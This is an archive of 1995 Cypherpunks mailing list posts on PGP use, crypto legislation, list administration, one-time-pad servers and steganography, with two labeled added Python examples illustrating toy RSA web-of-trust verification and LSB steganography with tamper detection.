	 I.e. to send a message to all our elected and appointed 
officials, send message to freetheworld@gateway.net. From there it gets 
spooled everywhere. What do you think? I could probably do it somehow, 
but someone with access to better resources and knowledge of cgi-bin 
might be better for the job. If anyone is interested in this project, let 
me know...

			R. Leland Lehrman

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roger@coelacanth.com (Roger Williams)
Date: Sat, 15 Jul 95 22:03:54 PDT
Subject: Re: speeding detected by civilians
In-Reply-To: <Pine.SUN.3.91.950713150252.17575B-100000@crl8.crl.com>
Message-ID: <rogerohyxp80a.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <3u4g3t$pn8@nntp.crl.com> Buzz@static.noise.net (Buzz White) writes:

   >> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
   >> citizens to check out radar guns from the local police department to 
   >> catch speeders in their community. The radar guns are combined with 
   >> cameras in order to instantaneously capture the car, license number, and the 
   >> rate of speed. The citizens can check out the units for a week at a time. The 
   >> police have stated that they, at this time, will use the data to issue 
   >> warning letters to the violators.

   Can they use them to bust COPS that speed?   Heh heh.

If Vernon Hills has any citizens left with spines, you can bet that
the local police are going to start to get a couple hundred pictures
of cop cars per week... Hell, I'll bet that I could take that many
by *myself* :)

-- 
Roger Williams  --  Coelacanth Engineering  --  Middleborough, Mass

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Fri, 14 Jul 95 17:17:00 PDT
To: cypherpunks@toad.com
Subject: ADMIN: List wipeout and recovery
Message-ID: <9507150012.AA03568@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  Yeghads, it happened again.  Last night at about 22:47 the disk
partition that holds the cypherpunks mail list filled up and when
someone tried to sub/un-scribe using Majordomo the list got zeroed.
  No one broke into the system to do any evil, it's just confusion,
rotten software and poor management by yours truly that caused the
problem.
  Next problem was that toad.com had changed a lot in the last 9
months, and we had moved things about in such a way that I did not
seem to have any backups of the file!  Today our gracious host, John
Gilmore called up to see what the problem was and if there was any way
to fix it.  Using two heads was better than one and we realized that we
had an online backup only 2 days old.  Minutes later it was installed
and the list is back to where it was late on 1995/07/11.

  So, some of you will need to un-subscribe again, our apologies about
that.  I will dig out the lost messages and make a digest-ish like
post of everything that was posted since about 22:30 last night.

  I will also look at moving away from MajorDomo as list software due
to its being moribund, old, stupid and bothersome!

  Thanks also go to L. McCarthy <lmccarth@cs.umass.edu> for sending
pleasant email to the right folks (majordomo-owner@toad.com is best)
to let us know that there was a problem.

  If you have any questions please send them directly to me as the
list is already full of off topic posts (big hint folks...).

		||ugh Daniel
		Majordomo Potty Trainer
		majordomo-owner@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Fri, 14 Jul 95 14:44:19 PDT
To: Steven Champeon - Imonics Development <schampeo@imonics.com>
Subject: Re: Eudora MacPGP Woes
In-Reply-To: <9507141334.AA07025@fugazi.imonics.com>
Message-ID: <Pine.SUN.3.91.950714174307.3458A-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Steven Champeon - Imonics Development wrote:

> Date: Fri, 14 Jul 1995 09:34:59 -0400
> From: Steven Champeon - Imonics Development <schampeo@imonics.com>
> To: unicorn@access.digex.net, hal9001@panix.com
> Cc: cypherpunks@toad.com
> Subject: Re: Eudora MacPGP Woes
> 
> 
> |   From: "Robert A. Rosenberg" <hal9001@panix.com>
> |   Subject: Re: Eudora MacPGP Woes
> |   
> |   At 14:40 7/8/95, Black Unicorn wrote:
> |   >I have noticed that an X-Attachement: header is added, but I have no idea
> |   >how to remove it without opening the Eudora outbox with teachtext or
> |   >something.
> |   
> |   Highlight the file name on the attachments line and hit delete to remove an
> |   attached file request.
> 
> I guess I'm still confused about why there's an X-Attachment: header being
> added. If the file is being generated by MacPGP without using the Applescript,
> you can simply open the resulting encoded file (provided it is being ascii-
> armored) from within Eudora then copy and paste it into an open Compose
> window. Voila. No X-Attachment: header. If you delete the file name on the
> attachments line, it also removes the attachment.
> 
> Mr. Unicorn: have you had any luck with the Applescript? You might try
> booting without extensions (except for Applescript) and open Eudora
> off-line and keep trying. 

Now that I have begun using the PGPkit versions of the scripts, all is 
well.  No idea what caused the headache.

> 
> Hope this helps,
> Steve
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 14 Jul 95 18:11:56 PDT
To: The Gate <bdolan@use.usit.net>
Subject: Re: Mr. Newbie...
Message-ID: <199507150109.SAA06854@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 7/13/95 -0400, The Gate wrote:
>
>	Okay folks, here comes Mr. Newbie.
>
>	Duh...How can I figure out how to use pgp. Is there a good place 
>to learn the background and basics in a step-by-step easy to understand 
>way? Duh... I think I wanna know...

The documentation that comes with PGP isn't bad; read the pgpdoc1 and
pgpdoc2 files.  (If you buy ViaCrypt, you get them in nice spiral-bound
manuals, but it's basically the same stuff.)  Here's an overview of the
basics:
- RSA public-key encryption lets you create a public encryption key which you
can publish, so that other people can encrypt files that can only be decrypted
with your private key.  It also lets you sign files by decrypting them with your
private key, which other people can check by encrypting with your public key
to get the original message (or a hash of it) back.  What makes this
mathematically cool is that it does it in a way that takes exponentially long
amounts of time to find your private key from the public key, so anybody who
wants to crack a reasonably long key needs to run a big hairy computer for
about the age of the planet to do so, but you can do decryption reasonably
fast because you already know the private key, and the same algorithm works
well for both encryption and digital signatures.

- RSA encryption isn't very fast, so most real programs that use it encrypt the
file with a conventional crypto algorithm (PGP uses IDEA) using a randomly
chosen session key, and encrypt the session key with RSA; it's a lot faster.

- The problem with public-key encryption is that anybody who wants to send
you a message needs to be sure they've really got _your_ public key instead
of a key that some Bad Guy published saying "Here's Alice's public key -
trust me!".  Since RSA can do digital signatures, PGP uses them to create a
"Web of Trust", where you can sign a message saying "Here is Alice's key,
signed Bob", and anybody who's got a good copy of your key (and trusts you)
will know they've got a good copy of Alice's key.  If they didn't get a copy
of your key directly from you, they may have a message saying "Here's Bob's
key, signed Carol", or maybe they got that and Carol's key, signed by Dave,
and they know Dave personally so they've checked it with him.  How big a Web
of Trust can you trust?  Well, you probably need more security if you're
running a revolution than if you're trying to find out if a Usenet article is
genuine or bogus, so PGP lets you choose, but the default is 4 levels deep.

- OK, so how do you get PGP? - there's an occasional publication on the net
that tells you where, but you can get it from ftp.ox.ac.uk by ftp with no
hassle.  Inside the US, you want version 2.6.2 for non-commercial use, and
you have to buy ViaCrypt's licensed version if you want to sell services
using it.  Outside the US, the version's something like 2.6.2i or something
ending in i.  3.0 will be out "Real Soon Now", probably in 1995, but it's
hard work.  Versions are available for DOS, Mac, Unix, and a few less popular
OSs.  ViaCrypt has a special Windows version; the rest of us Windows users
can either run it from DOS or use a front-end program like Private Idaho
(ftp.eskimo.com/joelm/) or WinPGP, available from popular FTP sites.
If you're using the Unix version, it's assumed you know how to read readme
files and compile using Make; DOS folks get binary as well as source and
documentation.  Unix folks will notice that the command line has this ugly
DOS feel to it :-)

- So you've got it installed and you've read the documentation, and messed with
the config.txt file if you didn't like the default options, and now
you want to do something.  Type "pgp -h" to get help, or "pgp -k" to get help
with keys for a reminder.  Then type "pgp -kg" to generate a key - you
probably want a 768-bit or 1024-bit key for normal use, unless you're
paranoid or have a slow computer.  Because RSA keys are long strings of
binary data that are hard for humans to remember, PGP stores them in a file,
encrypted with IDEA, and will prompt you for a "passphrase" for the
encryption.  Make it something long and complicated enough to be secure, but
easy for you to remember without writing it in a yellow sticky-note, and not
blatantly obvious.  You'll need to use it any time you decrypt a file
somebody else sent you, or sign a file you're sending to someone else.
You'll also need a name - typical format looks like
        Bob Dobbs <jrd@slack.com>
which has your name and email address.  Most of the time you'll just use an
abbreviation and let pgp figure it out.  To send your key to someone else,
once you've generated it, type "pgp -kx Dobbs filename" and it'll create a file
you can mail somebody else which will let them encrypt stuff to you.

To decrypt a file you got from someone else, type "pgp filename",
which will do the right thing for decryption, checking signatures,
receiving new keys, etc.  To encrypt a file to someone else, type
"pgp -e filename theirname" and pgp will create a file called filename.asc
(or filename.pgp if you don't have the ascii-armor option set, which you
should.)  To sign a file to send somebody, type "pgp -s filename", which
will do the same, and there are various options you should read in the
manual.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
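
The signing and Web of Trust ideas in the message above, as an added example that is not part of the original post and is not PGP's code: textbook RSA with constructed toy keys (no padding, not secure) signs "Here is X's key" statements, and a search accepts a key only if a chain of valid signatures within the depth limit links it to a key checked in person. The names `keygen`, `certify` and `find_chain`, the key seeds, and the rule that every validated key may introduce others are assumptions of this sketch.

```python
import hashlib
from collections import deque
from math import gcd, isqrt

MAX_DEPTH = 4  # chain-length limit; the message gives 4 as PGP's default


def next_prime(n):
    """Smallest prime >= n, by trial division (adequate for toy 31-bit primes)."""
    while not (n > 1 and all(n % f for f in range(2, isqrt(n) + 1))):
        n += 1
    return n


def keygen(seed):
    """Constructed toy RSA key pair derived from an integer seed. NOT secure."""
    p, q = next_prime(seed), next_prime(2 * seed)
    n, phi = p * q, (p - 1) * (q - 1)
    e = 65537
    while gcd(e, phi) != 1:          # pick a public exponent invertible mod phi
        e += 2
    return {"pub": (n, e), "priv": (n, pow(e, -1, phi))}


def digest(data, n):
    """SHA-256 of the data, reduced into the toy modulus."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(priv, data):
    """'Decrypt' the hash with the private exponent, as the message describes."""
    n, d = priv
    return pow(digest(data, n), d, n)


def verify(pub, data, sig):
    """'Encrypt' the signature with the public exponent and compare hashes."""
    n, e = pub
    return pow(sig, e, n) == digest(data, n)


def statement(name, pub):
    """The bytes a certifier signs: a name bound to one specific public key."""
    return f"Here is {name}'s key: n={pub[0]} e={pub[1]}".encode()


def certify(signer_name, signer_key, subject_name, subject_pub):
    return {"subject": subject_name, "pub": subject_pub, "signer": signer_name,
            "sig": sign(signer_key["priv"], statement(subject_name, subject_pub))}


def find_chain(trusted, certs, target_name, target_pub, max_depth=MAX_DEPTH):
    """Breadth-first search from keys checked in person (trusted: name -> pub).

    Returns the list of names linking a trusted key to the target key, or None
    if no chain of valid signatures exists within max_depth signature hops.
    """
    queue = deque((name, pub, [name]) for name, pub in trusted.items())
    seen = {(name, pub) for name, pub in trusted.items()}
    while queue:
        name, pub, path = queue.popleft()
        if (name, pub) == (target_name, target_pub):
            return path
        if len(path) - 1 >= max_depth:
            continue                  # chain already as deep as allowed
        for c in certs:
            node = (c["subject"], c["pub"])
            if c["signer"] != name or node in seen:
                continue
            # Follow a certificate only if it verifies under a validated key.
            if verify(pub, statement(*node), c["sig"]):
                seen.add(node)
                queue.append((*node, path + [c["subject"]]))
    return None


def demo():
    """Constructed scenario: Dave -> Carol -> Bob -> Alice, plus one forgery."""
    names = ["Alice", "Bob", "Carol", "Dave", "Mallory"]
    keys = {who: keygen(10**9 + 1000 * i) for i, who in enumerate(names)}
    forged = certify("Mallory", keys["Mallory"], "Alice", keys["Mallory"]["pub"])
    forged["signer"] = "Bob"          # claims "signed Bob", made with Mallory's key
    certs = [
        certify("Dave", keys["Dave"], "Carol", keys["Carol"]["pub"]),
        certify("Carol", keys["Carol"], "Bob", keys["Bob"]["pub"]),
        certify("Bob", keys["Bob"], "Alice", keys["Alice"]["pub"]),
        forged,
    ]
    return keys, certs, {"Dave": keys["Dave"]["pub"]}


if __name__ == "__main__":
    keys, certs, trusted = demo()
    print(find_chain(trusted, certs, "Alice", keys["Alice"]["pub"]))
    print(find_chain(trusted, certs, "Alice", keys["Mallory"]["pub"]))
```

The genuine key is reached in three signature hops; the "trust me" key fails because its claimed signer's public key does not verify the signature.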





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 14 Jul 95 18:12:43 PDT
To: cjl <cjl@welchlink.welch.jhu.edu>
Subject: Re: ping
In-Reply-To: <Pine.SOL.3.91.950714190206.3736A-100000@welchlink.welch.jhu.edu>
Message-ID: <Pine.SUN.3.91.950714180937.21410A-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 14 Jul 1995, cjl wrote:

> However, I have not gotten any mail from the list today which leads me to 
> believe that there is something wrong with the list-server, you couldn't 
> all possibly have been struck dumb with terror by the Your-ass-is 
> Grassley Act :-)

Nawh, We're all out celebrating Bastille Day.  Aren't you?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 14 Jul 95 18:50:53 PDT
To: cypherpunks
Subject: IEEE P1363 (public key crypto) standards meeting after Crypto
Message-ID: <9507150150.AA17439@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Even if you aren't going to Crypto, there are draft standards
documents, etc, FTP-able.  See below.  I haven't read them yet.

	John

Date: Thu, 13 Jul 95 10:56:18 PDT
From: Burt Kaliski <burt@rsa.com>
To: pem-dev@TIS.COM
Subject: Meeting announcement

  IEEE P1363: Standard for RSA, Diffie-Hellman and Related
                   Public-Key Cryptography


                       MEETING NOTICE

            Thursday, August 31, 1995, 1:00-6:00pm
            Friday, September 1, 1995, 9:00-6:00pm
         University of California, Santa Barbara, CA


This meeting of the P1363 working group, open to the public,
will focus on the editing of a draft standard for RSA,
Diffie-Hellman and other public-key cryptography. The
meeting follows the CRYPTO '95 conference, held August 27-31
at the same location.


AGENDA

    1. Approval of Agenda

    2. Approval of Minutes from May Meeting

    3. Officers' Reports

    4. Update on Patent Issues

    5. Proposals for New Sections

    6. Meeting Schedule

    7. Editorial Work (schedule to be determined based
       on availability of draft material)

    8. New Work Assignments

Depending on the amount of editorial work, the meeting may
end sooner than 6:00pm Friday.

If you'd like to participate, contact Burt Kaliski, the
working group's chair, at RSA Laboratories, 100 Marine
Parkway, Redwood City, CA 94065. Phone: (415) 595-7703, FAX:
(415) 595-4126, E-mail: burt@rsa.com.

Draft sections and copies of previous minutes are available
via anonymous ftp to ftp.rsa.com in the "pub/p1363"
directory. The working group's electronic mailing list is
<p1363@rsa.com>; to join, send e-mail to
<p1363-request@rsa.com>.

There will be a meeting fee, though the amount has not yet
been established, pending arrangements with the university.
It will also be possible for participants to arrange
accommodations at the university.


DIRECTIONS (excerpted from the CRYPTO announcement)

The campus is located approximately two miles from the Santa
Barbara airport, which is served by several airlines,
including American, America West, United and US Air. All
major rental car agencies are also represented in Santa
Barbara, and AMTRAK has rail connections to San Francisco
from the north and Los Angeles from the south. Santa Barbara
is approximately 100 miles north of the Los Angeles airport,
and 350 miles south of San Francisco.

For more information on the CRYPTO '95 conference, contact
Stafford Tavares, the general chair, at (613) 545-2945 or
<tavares@ee.queensu.ca>.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 14 Jul 95 17:16:05 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507141958.MAA06431@comsec.com>
Message-ID: <9507142311.AA09635@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 13 Jul 95 11:19:29 -0400
>From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>


>>In the subsection that explicitly mentions crypto, it says that it's
>>unlawful to put (non-GAK) crypto on an open net, "regardless of whether such
>>software has been designated non-exportable". If the phrase "nonexportable"
>>means the same thing in the context of this subsection, then provision (b)
>>would only seem to apply RICO to stuff that already falls under ITAR.
>
>What worries me is the first sentence: "each act of distributing
>software is considered a predicate act."  


The crypto section has no GAK exclusion.  It makes it as illegal to release
GAKed crypto on a net as PGP.



I believe that the concern about defining predicate acts this way comes
from the RICO requirement that there be TWO instances of a crime in order
to pass the test of perpetrating a *pattern of crime* and therefore be
ranked as a mobster subject to RICO.  My guess is that the intent is that
from one placement on an FTP server or one posting to a newsgroup, the
perpetrator of that heinous act will have passed his RICO qualification and
therefore be subject to having all he owns taken from him.

-------

Meanwhile, the Federal civil forfeiture fund goes to good things.  The last
$9M (I believe it was) went to buying up AT&T DES phones to be made into
Clipper phones.  Of course, the conversion hasn't happened yet and the DES
phones are sitting in a warehouse someplace -- but the $9M fund went to
really good use, saving the world from AT&T DES.

(sarcasm off)

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Fri, 14 Jul 95 16:15:39 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: ping
Message-ID: <Pine.SOL.3.91.950714190206.3736A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,

It was my intention to write a little summary of the story in the most 
recent issue of SCIENCE, which in addition to reporting some progress 
towards constructing a quantum computer, also reports in a side bar on 
a Los Alamos demonstration of untappable quantum cryptography in which a 
message was sent over 14 kilometers of fiberoptic cable and read with a 
1% error rate, secure in the knowledge that Eve couldn't possibly be 
listening.

However, I have not gotten any mail from the list today which leads me to 
believe that there is something wrong with the list-server, you couldn't 
all possibly have been struck dumb with terror by the Your-ass-is 
Grassley Act :-)

So this is a test, this is only a test.  Had this been a real message I 
would have sent more details about the stuff in SCIENCE.

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 14 Jul 95 17:23:05 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507141952.MAA06381@comsec.com>
Message-ID: <9507142327.AA10694@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 12 Jul 95 18:20:07 -0400
>From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>

>Finally, we begin to see the attack on all forms of un-escrowed
>encryption.  The bill provides an affirmable defense of
>giving the keys to the government ahead of time!
>
>       `(c) It shall be an affirmative defense to prosecution under this
>     section that the software at issue used a universal decoding device
>     or program that was provided to the Department of Justice prior to
>     the distribution.'.


This isn't escrowed encryption being allowed here.  This is straight giving
of keys (or a back door) to the gov't.  Even Clipper fails this test.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 14 Jul 95 19:39:53 PDT
To: cjl <cypherpunks@toad.com>
Subject: Re: ping
Message-ID: <v01520d02ac2cc63e11c9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:13 7/14/95, cjl wrote:
>Cypherpunks,
>
>It was my intention to write a little summary of the story in the most
>recent issue of SCIENCE

Can you scan it in?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Fri, 14 Jul 95 11:05:38 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01510103ac2b52dbb0ac@[193.74.217.16]>
MIME-Version: 1.0
Content-Type: text/plain


>---------- Forwarded message ----------
>Date: Wed, 12 Jul 1995 15:28:25 -0400
>Subject: Anti-Electronic Racketeering Act of 1995
>
>

>      "(2) to distribute computer software that encodes or encrypts
>    electronic or digital communications to computer networks that the
>    person distributing knows, or reasonably should know, is accessible to
>    foreign nationals and foreign governments, regardless of whether such
>    software has been designated nonexportable."

Christ, these guys are so predictable.  What do you want to bet that the last
clause of that paragraph was put in, just so it could be taken out?

Netscape, Apple, Novell et al testify before Congress; complain that their
crippled crypto has already been approved for export; they'll lose so much
money in sales, blah blah blah.  Grassley smiles for the camera, says "I'm
a reasonable man", strikes out the last clause.

Isn't democracy wonderful?

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: unicorn@polaris.mindport.net (Black Unicorn)
Date: Thu, 13 Jul 95 17:15:55 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: OTP server..
Message-ID: <v02130500ac2cc7c4390a@[205.219.167.38]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>How about WWW one time pad servers? You browse to your
>favorite OTP server, which has a random number generator
>running in the background. You tell it to give you a block
>of X bytes, and mail it to persons 1, 2, 3, ... N.
>
>These people then use this OTP for encrypting a document.
>It wouldn't be illegal because you aren't encoding any data
>and distributing it.. You're generating raw data. You wouldn't
>have to distribute any crypto software, you just xor your
>data file with the number of bytes that you were sent
>in the mail from the OTP server.. Enough of these things
>would be REALLY tough to monitor.. Plus, you could connect
>8 different times and just pick one of the sets.. Or you
>could just use a portion of the set that you and the receiving
>party agreed upon.
>
>Or, instead of using email, you could have a application/x-otp
>browser that would collect the OTP that the server sent out
>to you over HTTP. (this would be really hard to differentiate
>from other data if the server was doing other things at the
>same time).
>
>Thoughts?
>

I think you're trusting the server a GREAT deal.



> Doug Hughes                            Engineering Network Services
> doug@eng.auburn.edu                    Auburn University

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 14 Jul 95 17:23:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network")
Message-ID: <9507150023.AA10363@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hugh seems to have restored the full list on Majordomo, so I'll forward the
last couple of messages I sent/received yesterday that should have gone to
the whole list....

-Futplex

Forwarded message:
>From lmccarth Fri Jul 14 00:12:07 1995
Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network")
To: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <9507140229.AA13447@snark.imsi.com> from "Perry E. Metzger" at Jul 13, 95 10:29:29 pm

-----BEGIN PGP SIGNED MESSAGE-----

.pm writes:
> Indeed -- how could the recipient even know to look, unless these
> things arrived regularly and with a fully standardized form of
> steganography, in which case why bother, all you've done is come up
> with a very odd form of transfer encoding.

I agree, but AFAICS an odd form of transfer encoding is exactly what the
doctor ordered. For plausible cryptodeniability, one wants to send 
ciphertext using a transfer encoding that doesn't automatically ring alarm
bells. Steganography amounts to laundering Content-Type: headers.

> If the recipient does know to look, that implies either that there is
> a hint, in which case the steganography is useless, or it implies that
> you have prearrangement, in which case my comments on prearrangement
> hold.

If the recipient isn't getting spammed with GIFs (or whatever), she (or
rather her MDA) can simply look at all of them by default. Of course this
does not help with anonymous message pools on the order of Usenet, but that
is a sub-issue.

Deranged Mutant raised an IMHO important issue a few months ago. He suggested
that Mallet could go about trashing the purportedly "random" bits in each
instantiation of some transfer encoding used in a stego standard. For
example, he shuffles the LSBs of every passing JPEG. I'm not sure how feasible
this would really be (both technically and sociopolitically), but it
could be a big annoyance if only a few people were suspected of using stego
method XYZ. 

The standard answer to agent-in-the-middle tampering is of
course digital signatures. Now, the question is, will we be allowed to sign
our possibly-stego-enclosing GIFs with reasonable confidence that the govt.
can't forge our signatures ? Obviously the signature itself can't be
stegoed, or else we fall into an infinite regress.

 -Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAXuSWf7YYibNzjpAQHlpQP/f3/e5iRl67zU3TLYZH1oNBBjC1+LYPH8
VkQMhvtRdlo2xBkY56jaZ6hZuzWanknVD1EKrG72vl5sPytXXDs5dVplFlelVw6f
VjC2UxNHe0dQHmmJqXNMMq4qlC8ZxgtNf4P9O+6iJKjz6SbA7F6LuRd+3TXv5tHm
xgGSY5bzJp8=
=ia+X
-----END PGP SIGNATURE-----
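
[Added example, not part of the original message or of any tool it mentions: a sketch of the tampering scenario discussed above, where Mallet overwrites the low-order bits of a passing image and a detached integrity tag exposes the change. Assumptions: raw 8-bit samples stand in for image data, an HMAC stands in for the public-key signature, and all function names, keys and sample data are constructed for illustration.]

```python
import hashlib
import hmac
import random


def embed_lsb(cover: bytes, payload: bytes) -> bytes:
    """Write payload bits (MSB first) into the LSB of successive cover samples."""
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("payload does not fit in cover")
    out = bytearray(cover)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit
    return bytes(out)


def extract_lsb(samples: bytes, n_bytes: int) -> bytes:
    """Read n_bytes back out of the sample LSBs (inverse of embed_lsb)."""
    if n_bytes * 8 > len(samples):
        raise ValueError("not enough samples")
    out = bytearray()
    for b in range(n_bytes):
        value = 0
        for i in range(8):
            value = (value << 1) | (samples[b * 8 + i] & 1)
        out.append(value)
    return bytes(out)


def warden_scrub(samples: bytes, rng: random.Random) -> bytes:
    """Mallet in the middle: replace every LSB with a fresh random bit."""
    return bytes((s & 0xFE) | rng.getrandbits(1) for s in samples)


def max_sample_change(a: bytes, b: bytes) -> int:
    """Largest per-sample difference; 1 means the change is visually negligible."""
    return max(abs(x - y) for x, y in zip(a, b))


def tag(key: bytes, samples: bytes) -> bytes:
    """Detached integrity tag sent in the clear next to the image.
    HMAC-SHA256 is a stand-in here for a real digital signature."""
    return hmac.new(key, samples, hashlib.sha256).digest()


def verify(key: bytes, samples: bytes, expected: bytes) -> bool:
    return hmac.compare_digest(tag(key, samples), expected)


def demo() -> dict:
    rng = random.Random(1995)                      # fixed seed, repeatable run
    cover = bytes(rng.randrange(256) for _ in range(1024))  # constructed samples
    payload = b"constructed msg!"                  # stands in for ciphertext
    key = b"constructed shared key"                # constructed, illustration only

    stego = embed_lsb(cover, payload)
    sent_tag = tag(key, stego)                     # travels unhidden with the image
    scrubbed = warden_scrub(stego, rng)            # what arrives after Mallet

    return {
        "clean_roundtrip": extract_lsb(stego, len(payload)) == payload,
        "payload_survives_scrub": extract_lsb(scrubbed, len(payload)) == payload,
        "max_change": max_sample_change(stego, scrubbed),
        "tag_ok_before": verify(key, stego, sent_tag),
        "tag_ok_after": verify(key, scrubbed, sent_tag),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

[The tag tells the recipient that the image was altered in transit; it does not bring the scrubbed payload back.]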




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 14 Jul 95 19:30:32 PDT
To: snet-l@world.std.com
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <199507150229.UAA23961@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hooking up a mass mailer to congress seems like a bad idea to me, because
they're really only interested in their constituents. If they start getting
mass mailings, they might start thinking there's only one person or a
small group of people "behind the curtain". Sending results of an e-petition,
however, would be unobtrusive. A web page that mails a form letter to
_your_ congressperson's form-letter-readers (ie staff readers) would be
much better, IMHO.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: unicorn@polaris.mindport.net (Black Unicorn)
Date: Thu, 13 Jul 95 17:30:22 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: The end of public key cryptography as we know it?
Message-ID: <v02130501ac2ccb450beb@[205.219.167.38]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <199507132009.AA15283@tyrell.net>, pgf@tyrell.net (Phil
>Fraering       ) wrote:
>
